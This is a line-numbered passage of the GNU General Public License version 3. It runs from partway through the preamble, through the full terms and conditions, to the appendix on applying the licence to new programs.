responsibilities to respect the freedom 36 | of others. 37 | 38 | For example, if you distribute copies of such a program, whether 39 | gratis or for a fee, you must pass on to the recipients the same 40 | freedoms that you received. You must make sure that they, too, receive 41 | or can get the source code. And you must show them these terms so they 42 | know their rights. 43 | 44 | Developers that use the GNU GPL protect your rights with two steps: 45 | (1) assert copyright on the software, and (2) offer you this License 46 | giving you legal permission to copy, distribute and/or modify it. 47 | 48 | For the developers' and authors' protection, the GPL clearly explains 49 | that there is no warranty for this free software. For both users' and 50 | authors' sake, the GPL requires that modified versions be marked as 51 | changed, so that their problems will not be attributed erroneously to 52 | authors of previous versions. 53 | 54 | Some devices are designed to deny users access to install or run 55 | modified versions of the software inside them, although the 56 | manufacturer can do so. This is fundamentally incompatible with the 57 | aim of protecting users' freedom to change the software. The 58 | systematic pattern of such abuse occurs in the area of products for 59 | individuals to use, which is precisely where it is most unacceptable. 60 | Therefore, we have designed this version of the GPL to prohibit the 61 | practice for those products. If such problems arise substantially in 62 | other domains, we stand ready to extend this provision to those 63 | domains in future versions of the GPL, as needed to protect the 64 | freedom of users. 65 | 66 | Finally, every program is threatened constantly by software patents. 67 | States should not allow patents to restrict development and use of 68 | software on general-purpose computers, but in those that do, we wish 69 | to avoid the special danger that patents applied to a free program 70 | could make it effectively proprietary. To prevent this, the GPL 71 | assures that patents cannot be used to render the program non-free. 72 | 73 | The precise terms and conditions for copying, distribution and 74 | modification follow. 75 | 76 | ### TERMS AND CONDITIONS 77 | 78 | #### 0. Definitions. 79 | 80 | "This License" refers to version 3 of the GNU General Public License. 81 | 82 | "Copyright" also means copyright-like laws that apply to other kinds 83 | of works, such as semiconductor masks. 84 | 85 | "The Program" refers to any copyrightable work licensed under this 86 | License. Each licensee is addressed as "you". "Licensees" and 87 | "recipients" may be individuals or organizations. 88 | 89 | To "modify" a work means to copy from or adapt all or part of the work 90 | in a fashion requiring copyright permission, other than the making of 91 | an exact copy. The resulting work is called a "modified version" of 92 | the earlier work or a work "based on" the earlier work. 93 | 94 | A "covered work" means either the unmodified Program or a work based 95 | on the Program. 96 | 97 | To "propagate" a work means to do anything with it that, without 98 | permission, would make you directly or secondarily liable for 99 | infringement under applicable copyright law, except executing it on a 100 | computer or modifying a private copy. Propagation includes copying, 101 | distribution (with or without modification), making available to the 102 | public, and in some countries other activities as well. 103 | 104 | To "convey" a work means any kind of propagation that enables other 105 | parties to make or receive copies. Mere interaction with a user 106 | through a computer network, with no transfer of a copy, is not 107 | conveying. 108 | 109 | An interactive user interface displays "Appropriate Legal Notices" to 110 | the extent that it includes a convenient and prominently visible 111 | feature that (1) displays an appropriate copyright notice, and (2) 112 | tells the user that there is no warranty for the work (except to the 113 | extent that warranties are provided), that licensees may convey the 114 | work under this License, and how to view a copy of this License. If 115 | the interface presents a list of user commands or options, such as a 116 | menu, a prominent item in the list meets this criterion. 117 | 118 | #### 1. Source Code. 119 | 120 | The "source code" for a work means the preferred form of the work for 121 | making modifications to it. "Object code" means any non-source form of 122 | a work. 123 | 124 | A "Standard Interface" means an interface that either is an official 125 | standard defined by a recognized standards body, or, in the case of 126 | interfaces specified for a particular programming language, one that 127 | is widely used among developers working in that language. 128 | 129 | The "System Libraries" of an executable work include anything, other 130 | than the work as a whole, that (a) is included in the normal form of 131 | packaging a Major Component, but which is not part of that Major 132 | Component, and (b) serves only to enable use of the work with that 133 | Major Component, or to implement a Standard Interface for which an 134 | implementation is available to the public in source code form. A 135 | "Major Component", in this context, means a major essential component 136 | (kernel, window system, and so on) of the specific operating system 137 | (if any) on which the executable work runs, or a compiler used to 138 | produce the work, or an object code interpreter used to run it. 139 | 140 | The "Corresponding Source" for a work in object code form means all 141 | the source code needed to generate, install, and (for an executable 142 | work) run the object code and to modify the work, including scripts to 143 | control those activities. However, it does not include the work's 144 | System Libraries, or general-purpose tools or generally available free 145 | programs which are used unmodified in performing those activities but 146 | which are not part of the work. For example, Corresponding Source 147 | includes interface definition files associated with source files for 148 | the work, and the source code for shared libraries and dynamically 149 | linked subprograms that the work is specifically designed to require, 150 | such as by intimate data communication or control flow between those 151 | subprograms and other parts of the work. 152 | 153 | The Corresponding Source need not include anything that users can 154 | regenerate automatically from other parts of the Corresponding Source. 155 | 156 | The Corresponding Source for a work in source code form is that same 157 | work. 158 | 159 | #### 2. Basic Permissions. 160 | 161 | All rights granted under this License are granted for the term of 162 | copyright on the Program, and are irrevocable provided the stated 163 | conditions are met. This License explicitly affirms your unlimited 164 | permission to run the unmodified Program. The output from running a 165 | covered work is covered by this License only if the output, given its 166 | content, constitutes a covered work. This License acknowledges your 167 | rights of fair use or other equivalent, as provided by copyright law. 168 | 169 | You may make, run and propagate covered works that you do not convey, 170 | without conditions so long as your license otherwise remains in force. 171 | You may convey covered works to others for the sole purpose of having 172 | them make modifications exclusively for you, or provide you with 173 | facilities for running those works, provided that you comply with the 174 | terms of this License in conveying all material for which you do not 175 | control copyright. Those thus making or running the covered works for 176 | you must do so exclusively on your behalf, under your direction and 177 | control, on terms that prohibit them from making any copies of your 178 | copyrighted material outside their relationship with you. 179 | 180 | Conveying under any other circumstances is permitted solely under the 181 | conditions stated below. Sublicensing is not allowed; section 10 makes 182 | it unnecessary. 183 | 184 | #### 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 185 | 186 | No covered work shall be deemed part of an effective technological 187 | measure under any applicable law fulfilling obligations under article 188 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 189 | similar laws prohibiting or restricting circumvention of such 190 | measures. 191 | 192 | When you convey a covered work, you waive any legal power to forbid 193 | circumvention of technological measures to the extent such 194 | circumvention is effected by exercising rights under this License with 195 | respect to the covered work, and you disclaim any intention to limit 196 | operation or modification of the work as a means of enforcing, against 197 | the work's users, your or third parties' legal rights to forbid 198 | circumvention of technological measures. 199 | 200 | #### 4. Conveying Verbatim Copies. 201 | 202 | You may convey verbatim copies of the Program's source code as you 203 | receive it, in any medium, provided that you conspicuously and 204 | appropriately publish on each copy an appropriate copyright notice; 205 | keep intact all notices stating that this License and any 206 | non-permissive terms added in accord with section 7 apply to the code; 207 | keep intact all notices of the absence of any warranty; and give all 208 | recipients a copy of this License along with the Program. 209 | 210 | You may charge any price or no price for each copy that you convey, 211 | and you may offer support or warranty protection for a fee. 212 | 213 | #### 5. Conveying Modified Source Versions. 214 | 215 | You may convey a work based on the Program, or the modifications to 216 | produce it from the Program, in the form of source code under the 217 | terms of section 4, provided that you also meet all of these 218 | conditions: 219 | 220 | - a) The work must carry prominent notices stating that you modified 221 | it, and giving a relevant date. 222 | - b) The work must carry prominent notices stating that it is 223 | released under this License and any conditions added under 224 | section 7. This requirement modifies the requirement in section 4 225 | to "keep intact all notices". 226 | - c) You must license the entire work, as a whole, under this 227 | License to anyone who comes into possession of a copy. This 228 | License will therefore apply, along with any applicable section 7 229 | additional terms, to the whole of the work, and all its parts, 230 | regardless of how they are packaged. This License gives no 231 | permission to license the work in any other way, but it does not 232 | invalidate such permission if you have separately received it. 233 | - d) If the work has interactive user interfaces, each must display 234 | Appropriate Legal Notices; however, if the Program has interactive 235 | interfaces that do not display Appropriate Legal Notices, your 236 | work need not make them do so. 237 | 238 | A compilation of a covered work with other separate and independent 239 | works, which are not by their nature extensions of the covered work, 240 | and which are not combined with it such as to form a larger program, 241 | in or on a volume of a storage or distribution medium, is called an 242 | "aggregate" if the compilation and its resulting copyright are not 243 | used to limit the access or legal rights of the compilation's users 244 | beyond what the individual works permit. Inclusion of a covered work 245 | in an aggregate does not cause this License to apply to the other 246 | parts of the aggregate. 247 | 248 | #### 6. Conveying Non-Source Forms. 249 | 250 | You may convey a covered work in object code form under the terms of 251 | sections 4 and 5, provided that you also convey the machine-readable 252 | Corresponding Source under the terms of this License, in one of these 253 | ways: 254 | 255 | - a) Convey the object code in, or embodied in, a physical product 256 | (including a physical distribution medium), accompanied by the 257 | Corresponding Source fixed on a durable physical medium 258 | customarily used for software interchange. 259 | - b) Convey the object code in, or embodied in, a physical product 260 | (including a physical distribution medium), accompanied by a 261 | written offer, valid for at least three years and valid for as 262 | long as you offer spare parts or customer support for that product 263 | model, to give anyone who possesses the object code either (1) a 264 | copy of the Corresponding Source for all the software in the 265 | product that is covered by this License, on a durable physical 266 | medium customarily used for software interchange, for a price no 267 | more than your reasonable cost of physically performing this 268 | conveying of source, or (2) access to copy the Corresponding 269 | Source from a network server at no charge. 270 | - c) Convey individual copies of the object code with a copy of the 271 | written offer to provide the Corresponding Source. This 272 | alternative is allowed only occasionally and noncommercially, and 273 | only if you received the object code with such an offer, in accord 274 | with subsection 6b. 275 | - d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | - e) Convey the object code using peer-to-peer transmission, 288 | provided you inform other peers where the object code and 289 | Corresponding Source of the work are being offered to the general 290 | public at no charge under subsection 6d. 291 | 292 | A separable portion of the object code, whose source code is excluded 293 | from the Corresponding Source as a System Library, need not be 294 | included in conveying the object code work. 295 | 296 | A "User Product" is either (1) a "consumer product", which means any 297 | tangible personal property which is normally used for personal, 298 | family, or household purposes, or (2) anything designed or sold for 299 | incorporation into a dwelling. In determining whether a product is a 300 | consumer product, doubtful cases shall be resolved in favor of 301 | coverage. For a particular product received by a particular user, 302 | "normally used" refers to a typical or common use of that class of 303 | product, regardless of the status of the particular user or of the way 304 | in which the particular user actually uses, or expects or is expected 305 | to use, the product. A product is a consumer product regardless of 306 | whether the product has substantial commercial, industrial or 307 | non-consumer uses, unless such uses represent the only significant 308 | mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to 312 | install and execute modified versions of a covered work in that User 313 | Product from a modified version of its Corresponding Source. The 314 | information must suffice to ensure that the continued functioning of 315 | the modified object code is in no case prevented or interfered with 316 | solely because modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or 331 | updates for a work that has been modified or installed by the 332 | recipient, or for the User Product in which it has been modified or 333 | installed. Access to a network may be denied when the modification 334 | itself materially and adversely affects the operation of the network 335 | or violates the rules and protocols for communication across the 336 | network. 337 | 338 | Corresponding Source conveyed, and Installation Information provided, 339 | in accord with this section must be in a format that is publicly 340 | documented (and with an implementation available to the public in 341 | source code form), and must require no special password or key for 342 | unpacking, reading or copying. 343 | 344 | #### 7. Additional Terms. 345 | 346 | "Additional permissions" are terms that supplement the terms of this 347 | License by making exceptions from one or more of its conditions. 348 | Additional permissions that are applicable to the entire Program shall 349 | be treated as though they were included in this License, to the extent 350 | that they are valid under applicable law. If additional permissions 351 | apply only to part of the Program, that part may be used separately 352 | under those permissions, but the entire Program remains governed by 353 | this License without regard to the additional permissions. 354 | 355 | When you convey a copy of a covered work, you may at your option 356 | remove any additional permissions from that copy, or from any part of 357 | it. (Additional permissions may be written to require their own 358 | removal in certain cases when you modify the work.) You may place 359 | additional permissions on material, added by you to a covered work, 360 | for which you have or can give appropriate copyright permission. 361 | 362 | Notwithstanding any other provision of this License, for material you 363 | add to a covered work, you may (if authorized by the copyright holders 364 | of that material) supplement the terms of this License with terms: 365 | 366 | - a) Disclaiming warranty or limiting liability differently from the 367 | terms of sections 15 and 16 of this License; or 368 | - b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | - c) Prohibiting misrepresentation of the origin of that material, 372 | or requiring that modified versions of such material be marked in 373 | reasonable ways as different from the original version; or 374 | - d) Limiting the use for publicity purposes of names of licensors 375 | or authors of the material; or 376 | - e) Declining to grant rights under trademark law for use of some 377 | trade names, trademarks, or service marks; or 378 | - f) Requiring indemnification of licensors and authors of that 379 | material by anyone who conveys the material (or modified versions 380 | of it) with contractual assumptions of liability to the recipient, 381 | for any liability that these contractual assumptions directly 382 | impose on those licensors and authors. 383 | 384 | All other non-permissive additional terms are considered "further 385 | restrictions" within the meaning of section 10. If the Program as you 386 | received it, or any part of it, contains a notice stating that it is 387 | governed by this License along with a term that is a further 388 | restriction, you may remove that term. If a license document contains 389 | a further restriction but permits relicensing or conveying under this 390 | License, you may add to a covered work material governed by the terms 391 | of that license document, provided that the further restriction does 392 | not survive such relicensing or conveying. 393 | 394 | If you add terms to a covered work in accord with this section, you 395 | must place, in the relevant source files, a statement of the 396 | additional terms that apply to those files, or a notice indicating 397 | where to find the applicable terms. 398 | 399 | Additional terms, permissive or non-permissive, may be stated in the 400 | form of a separately written license, or stated as exceptions; the 401 | above requirements apply either way. 402 | 403 | #### 8. Termination. 404 | 405 | You may not propagate or modify a covered work except as expressly 406 | provided under this License. Any attempt otherwise to propagate or 407 | modify it is void, and will automatically terminate your rights under 408 | this License (including any patent licenses granted under the third 409 | paragraph of section 11). 410 | 411 | However, if you cease all violation of this License, then your license 412 | from a particular copyright holder is reinstated (a) provisionally, 413 | unless and until the copyright holder explicitly and finally 414 | terminates your license, and (b) permanently, if the copyright holder 415 | fails to notify you of the violation by some reasonable means prior to 416 | 60 days after the cessation. 417 | 418 | Moreover, your license from a particular copyright holder is 419 | reinstated permanently if the copyright holder notifies you of the 420 | violation by some reasonable means, this is the first time you have 421 | received notice of violation of this License (for any work) from that 422 | copyright holder, and you cure the violation prior to 30 days after 423 | your receipt of the notice. 424 | 425 | Termination of your rights under this section does not terminate the 426 | licenses of parties who have received copies or rights from you under 427 | this License. If your rights have been terminated and not permanently 428 | reinstated, you do not qualify to receive new licenses for the same 429 | material under section 10. 430 | 431 | #### 9. Acceptance Not Required for Having Copies. 432 | 433 | You are not required to accept this License in order to receive or run 434 | a copy of the Program. Ancillary propagation of a covered work 435 | occurring solely as a consequence of using peer-to-peer transmission 436 | to receive a copy likewise does not require acceptance. However, 437 | nothing other than this License grants you permission to propagate or 438 | modify any covered work. These actions infringe copyright if you do 439 | not accept this License. Therefore, by modifying or propagating a 440 | covered work, you indicate your acceptance of this License to do so. 441 | 442 | #### 10. Automatic Licensing of Downstream Recipients. 443 | 444 | Each time you convey a covered work, the recipient automatically 445 | receives a license from the original licensors, to run, modify and 446 | propagate that work, subject to this License. You are not responsible 447 | for enforcing compliance by third parties with this License. 448 | 449 | An "entity transaction" is a transaction transferring control of an 450 | organization, or substantially all assets of one, or subdividing an 451 | organization, or merging organizations. If propagation of a covered 452 | work results from an entity transaction, each party to that 453 | transaction who receives a copy of the work also receives whatever 454 | licenses to the work the party's predecessor in interest had or could 455 | give under the previous paragraph, plus a right to possession of the 456 | Corresponding Source of the work from the predecessor in interest, if 457 | the predecessor has it or can get it with reasonable efforts. 458 | 459 | You may not impose any further restrictions on the exercise of the 460 | rights granted or affirmed under this License. For example, you may 461 | not impose a license fee, royalty, or other charge for exercise of 462 | rights granted under this License, and you may not initiate litigation 463 | (including a cross-claim or counterclaim in a lawsuit) alleging that 464 | any patent claim is infringed by making, using, selling, offering for 465 | sale, or importing the Program or any portion of it. 466 | 467 | #### 11. Patents. 468 | 469 | A "contributor" is a copyright holder who authorizes use under this 470 | License of the Program or a work on which the Program is based. The 471 | work thus licensed is called the contributor's "contributor version". 472 | 473 | A contributor's "essential patent claims" are all patent claims owned 474 | or controlled by the contributor, whether already acquired or 475 | hereafter acquired, that would be infringed by some manner, permitted 476 | by this License, of making, using, or selling its contributor version, 477 | but do not include claims that would be infringed only as a 478 | consequence of further modification of the contributor version. For 479 | purposes of this definition, "control" includes the right to grant 480 | patent sublicenses in a manner consistent with the requirements of 481 | this License. 482 | 483 | Each contributor grants you a non-exclusive, worldwide, royalty-free 484 | patent license under the contributor's essential patent claims, to 485 | make, use, sell, offer for sale, import and otherwise run, modify and 486 | propagate the contents of its contributor version. 487 | 488 | In the following three paragraphs, a "patent license" is any express 489 | agreement or commitment, however denominated, not to enforce a patent 490 | (such as an express permission to practice a patent or covenant not to 491 | sue for patent infringement). To "grant" such a patent license to a 492 | party means to make such an agreement or commitment not to enforce a 493 | patent against the party. 494 | 495 | If you convey a covered work, knowingly relying on a patent license, 496 | and the Corresponding Source of the work is not available for anyone 497 | to copy, free of charge and under the terms of this License, through a 498 | publicly available network server or other readily accessible means, 499 | then you must either (1) cause the Corresponding Source to be so 500 | available, or (2) arrange to deprive yourself of the benefit of the 501 | patent license for this particular work, or (3) arrange, in a manner 502 | consistent with the requirements of this License, to extend the patent 503 | license to downstream recipients. "Knowingly relying" means you have 504 | actual knowledge that, but for the patent license, your conveying the 505 | covered work in a country, or your recipient's use of the covered work 506 | in a country, would infringe one or more identifiable patents in that 507 | country that you have reason to believe are valid. 508 | 509 | If, pursuant to or in connection with a single transaction or 510 | arrangement, you convey, or propagate by procuring conveyance of, a 511 | covered work, and grant a patent license to some of the parties 512 | receiving the covered work authorizing them to use, propagate, modify 513 | or convey a specific copy of the covered work, then the patent license 514 | you grant is automatically extended to all recipients of the covered 515 | work and works based on it. 516 | 517 | A patent license is "discriminatory" if it does not include within the 518 | scope of its coverage, prohibits the exercise of, or is conditioned on 519 | the non-exercise of one or more of the rights that are specifically 520 | granted under this License. You may not convey a covered work if you 521 | are a party to an arrangement with a third party that is in the 522 | business of distributing software, under which you make payment to the 523 | third party based on the extent of your activity of conveying the 524 | work, and under which the third party grants, to any of the parties 525 | who would receive the covered work from you, a discriminatory patent 526 | license (a) in connection with copies of the covered work conveyed by 527 | you (or copies made from those copies), or (b) primarily for and in 528 | connection with specific products or compilations that contain the 529 | covered work, unless you entered into that arrangement, or that patent 530 | license was granted, prior to 28 March 2007. 531 | 532 | Nothing in this License shall be construed as excluding or limiting 533 | any implied license or other defenses to infringement that may 534 | otherwise be available to you under applicable patent law. 535 | 536 | #### 12. No Surrender of Others' Freedom. 537 | 538 | If conditions are imposed on you (whether by court order, agreement or 539 | otherwise) that contradict the conditions of this License, they do not 540 | excuse you from the conditions of this License. If you cannot convey a 541 | covered work so as to satisfy simultaneously your obligations under 542 | this License and any other pertinent obligations, then as a 543 | consequence you may not convey it at all. For example, if you agree to 544 | terms that obligate you to collect a royalty for further conveying 545 | from those to whom you convey the Program, the only way you could 546 | satisfy both those terms and this License would be to refrain entirely 547 | from conveying the Program. 548 | 549 | #### 13. Use with the GNU Affero General Public License. 550 | 551 | Notwithstanding any other provision of this License, you have 552 | permission to link or combine any covered work with a work licensed 553 | under version 3 of the GNU Affero General Public License into a single 554 | combined work, and to convey the resulting work. The terms of this 555 | License will continue to apply to the part which is the covered work, 556 | but the special requirements of the GNU Affero General Public License, 557 | section 13, concerning interaction through a network will apply to the 558 | combination as such. 559 | 560 | #### 14. Revised Versions of this License. 561 | 562 | The Free Software Foundation may publish revised and/or new versions 563 | of the GNU General Public License from time to time. Such new versions 564 | will be similar in spirit to the present version, but may differ in 565 | detail to address new problems or concerns. 566 | 567 | Each version is given a distinguishing version number. If the Program 568 | specifies that a certain numbered version of the GNU General Public 569 | License "or any later version" applies to it, you have the option of 570 | following the terms and conditions either of that numbered version or 571 | of any later version published by the Free Software Foundation. If the 572 | Program does not specify a version number of the GNU General Public 573 | License, you may choose any version ever published by the Free 574 | Software Foundation. 575 | 576 | If the Program specifies that a proxy can decide which future versions 577 | of the GNU General Public License can be used, that proxy's public 578 | statement of acceptance of a version permanently authorizes you to 579 | choose that version for the Program. 580 | 581 | Later license versions may give you additional or different 582 | permissions. However, no additional obligations are imposed on any 583 | author or copyright holder as a result of your choosing to follow a 584 | later version. 585 | 586 | #### 15. Disclaimer of Warranty. 587 | 588 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 589 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 590 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT 591 | WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT 592 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 593 | A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND 594 | PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE 595 | DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR 596 | CORRECTION. 597 | 598 | #### 16. Limitation of Liability. 599 | 600 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 601 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR 602 | CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 603 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES 604 | ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT 605 | NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR 606 | LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM 607 | TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER 608 | PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 609 | 610 | #### 17. Interpretation of Sections 15 and 16. 611 | 612 | If the disclaimer of warranty and limitation of liability provided 613 | above cannot be given local legal effect according to their terms, 614 | reviewing courts shall apply local law that most closely approximates 615 | an absolute waiver of all civil liability in connection with the 616 | Program, unless a warranty or assumption of liability accompanies a 617 | copy of the Program in return for a fee. 618 | 619 | END OF TERMS AND CONDITIONS 620 | 621 | ### How to Apply These Terms to Your New Programs 622 | 623 | If you develop a new program, and you want it to be of the greatest 624 | possible use to the public, the best way to achieve this is to make it 625 | free software which everyone can redistribute and change under these 626 | terms. 627 | 628 | To do so, attach the following notices to the program. It is safest to 629 | attach them to the start of each source file to most effectively state 630 | the exclusion of warranty; and each file should have at least the 631 | "copyright" line and a pointer to where the full notice is found. 632 | 633 | 634 | Copyright (C) 635 | 636 | This program is free software: you can redistribute it and/or modify 637 | it under the terms of the GNU General Public License as published by 638 | the Free Software Foundation, either version 3 of the License, or 639 | (at your option) any later version. 640 | 641 | This program is distributed in the hope that it will be useful, 642 | but WITHOUT ANY WARRANTY; without even the implied warranty of 643 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 644 | GNU General Public License for more details. 645 | 646 | You should have received a copy of the GNU General Public License 647 | along with this program. If not, see . 648 | 649 | Also add information on how to contact you by electronic and paper 650 | mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands \`show w' and \`show c' should show the 661 | appropriate parts of the General Public License. Of course, your 662 | program's commands might be different; for a GUI interface, you would 663 | use an "about box". 664 | 665 | You should also get your employer (if you work as a programmer) or 666 | school, if any, to sign a "copyright disclaimer" for the program, if 667 | necessary. For more information on this, and how to apply and follow 668 | the GNU GPL, see . 669 | 670 | The GNU General Public License does not permit incorporating your 671 | program into proprietary programs. If your program is a subroutine 672 | library, you may consider it more useful to permit linking proprietary 673 | applications with the library. If this is what you want to do, use the 674 | GNU Lesser General Public License instead of this License. But first, 675 | please read . 676 | --------------------------------------------------------------------------------